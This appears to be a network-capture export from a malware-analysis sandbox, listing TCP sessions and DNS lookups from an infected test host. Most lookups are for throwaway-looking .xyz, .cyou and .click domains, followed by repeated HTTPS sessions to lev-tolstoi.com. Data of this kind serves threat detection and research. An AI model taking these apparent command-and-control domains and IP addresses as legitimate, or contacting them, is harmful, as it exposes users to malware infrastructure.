                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.233977079 CET49760443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.233998060 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.234095097 CET49760443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.263920069 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.263973951 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.263999939 CET49760443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.264014006 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.264054060 CET49760443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.264112949 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.264213085 CET49760443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.266022921 CET49760443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.266062021 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.266087055 CET49760443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.266100883 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.505487919 CET49765443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.505517006 CET44349765104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.505593061 CET49765443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.505882978 CET49765443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.505893946 CET44349765104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:11.733098984 CET44349765104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:11.733313084 CET49765443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:11.734860897 CET49765443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:11.734865904 CET44349765104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:11.735363960 CET44349765104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:11.736491919 CET49765443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:11.736510992 CET49765443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:11.736579895 CET44349765104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:12.482942104 CET44349765104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:12.483202934 CET44349765104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:12.483262062 CET49765443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:12.483655930 CET49765443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:12.483669043 CET44349765104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:12.514930964 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:12.514969110 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:12.515084982 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:12.515387058 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:12.515400887 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:13.815565109 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:13.815665007 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:13.816943884 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:13.816952944 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:13.817276001 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:13.818515062 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:13.818545103 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:13.818592072 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.582496881 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.582628965 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.582674026 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.582686901 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.582797050 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.582839966 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.582848072 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.582968950 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.583014965 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.583020926 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.596352100 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.596419096 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.596426010 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.610574961 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.610651016 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.610656977 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.654572010 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.702038050 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.748326063 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.748383045 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778318882 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778410912 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778433084 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778455973 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778570890 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778585911 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778652906 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778757095 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778986931 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.779005051 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.779016018 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.779022932 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.933125973 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.933223963 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.933383942 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.933653116 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.933687925 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.153753042 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.153911114 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.155582905 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.155615091 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.156301975 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.157481909 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.157655001 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.157742023 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.157820940 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.157835960 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.087660074 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.087891102 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.087970018 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.088052034 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.088088989 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.179697990 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.179744959 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.179824114 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.180084944 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.180113077 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:18.401031017 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:18.401160002 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:18.404786110 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:18.404820919 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:18.405239105 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:18.406471968 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:18.406805992 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:18.406852007 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.492739916 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.492990017 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.493052959 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.493119955 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.493139029 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.732254982 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.732289076 CET44349793104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.732369900 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.732749939 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.732764959 CET44349793104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.953237057 CET44349793104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.953352928 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.954494953 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.954504967 CET44349793104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.955197096 CET44349793104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.958548069 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.958652020 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.958690882 CET44349793104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.958781004 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.958791018 CET44349793104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:21.911938906 CET44349793104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:21.912178040 CET44349793104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:21.912237883 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:21.913855076 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:21.913866043 CET44349793104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:22.443367004 CET49800443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:22.443398952 CET44349800104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:22.443731070 CET49800443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:22.444041014 CET49800443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:22.444055080 CET44349800104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:23.663167000 CET44349800104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:23.663285971 CET49800443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:23.666248083 CET49800443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:23.666256905 CET44349800104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:23.666678905 CET44349800104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:23.669106960 CET49800443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:23.669178009 CET49800443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:23.669183969 CET44349800104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:24.465372086 CET44349800104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:24.465621948 CET44349800104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:24.465711117 CET49800443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:24.466039896 CET49800443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:24.466058969 CET44349800104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:25.062551975 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:25.062587976 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:25.062666893 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:25.063044071 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:25.063061953 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.284091949 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.284169912 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.285254955 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.285264969 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.285743952 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.286955118 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.287750006 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.287791014 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.287894011 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.287929058 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.288041115 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.288095951 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.288224936 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.288249016 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.288392067 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.288412094 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.288568974 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.288599014 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.288608074 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.288739920 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.288770914 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.335336924 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.335515976 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.335567951 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.335583925 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.379370928 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.379576921 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.379612923 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.379640102 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.423378944 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.423628092 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.467329979 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:26.648612022 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:29.096524954 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:29.096781969 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:29.096847057 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:29.097001076 CET49806443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:29.097011089 CET44349806104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:29.131506920 CET49817443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:29.131582975 CET44349817104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:29.131674051 CET49817443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:29.131975889 CET49817443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:29.132008076 CET44349817104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:30.201673985 CET49817443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:02.275654078 CET5407353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:02.496366024 CET53540731.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:02.500402927 CET5362653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:02.728920937 CET53536261.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:34.220897913 CET5183753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:34.442045927 CET53518371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:06.218733072 CET5645653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:06.436134100 CET53564561.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:06.438205957 CET5425953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:06.676548958 CET53542591.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:06.680617094 CET5214453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:06.899812937 CET53521441.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:06.901473999 CET6531753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.207168102 CET53653171.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.209728003 CET6064453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.518980980 CET53606441.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.522612095 CET5440053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.746644020 CET53544001.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.748267889 CET5076053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.885488987 CET53507601.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.270246983 CET5707953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.504798889 CET53570791.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:02.275654078 CET192.168.2.41.1.1.10x9665Standard query (0)bellflamre.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:02.500402927 CET192.168.2.41.1.1.10x8adStandard query (0)sendypaster.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:34.220897913 CET192.168.2.41.1.1.10x32deStandard query (0)steppriflej.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:06.218733072 CET192.168.2.41.1.1.10x4c15Standard query (0)greywe-snotty.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:06.438205957 CET192.168.2.41.1.1.10x9c09Standard query (0)supporse-comment.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:06.680617094 CET192.168.2.41.1.1.10x4f42Standard query (0)smash-boiling.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:06.901473999 CET192.168.2.41.1.1.10xf80eStandard query (0)ripe-blade.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.209728003 CET192.168.2.41.1.1.10xc21cStandard query (0)hosue-billowy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.522612095 CET192.168.2.41.1.1.10x687aStandard query (0)pollution-raker.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.748267889 CET192.168.2.41.1.1.10x2e7dStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.270246983 CET192.168.2.41.1.1.10x6bf7Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:02.496366024 CET1.1.1.1192.168.2.40x9665Name error (3)bellflamre.clicknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:02.728920937 CET1.1.1.1192.168.2.40x8adNo error (0)sendypaster.xyz193.143.1.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:34.442045927 CET1.1.1.1192.168.2.40x32deNo error (0)steppriflej.xyz193.143.1.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:06.436134100 CET1.1.1.1192.168.2.40x4c15Name error (3)greywe-snotty.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:06.676548958 CET1.1.1.1192.168.2.40x9c09Name error (3)supporse-comment.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:06.899812937 CET1.1.1.1192.168.2.40x4f42Name error (3)smash-boiling.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.207168102 CET1.1.1.1192.168.2.40xf80eName error (3)ripe-blade.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.518980980 CET1.1.1.1192.168.2.40xc21cName error (3)hosue-billowy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.746644020 CET1.1.1.1192.168.2.40x687aName error (3)pollution-raker.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.885488987 CET1.1.1.1192.168.2.40x2e7dNo error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.504798889 CET1.1.1.1192.168.2.40x6bf7No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.504798889 CET1.1.1.1192.168.2.40x6bf7No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
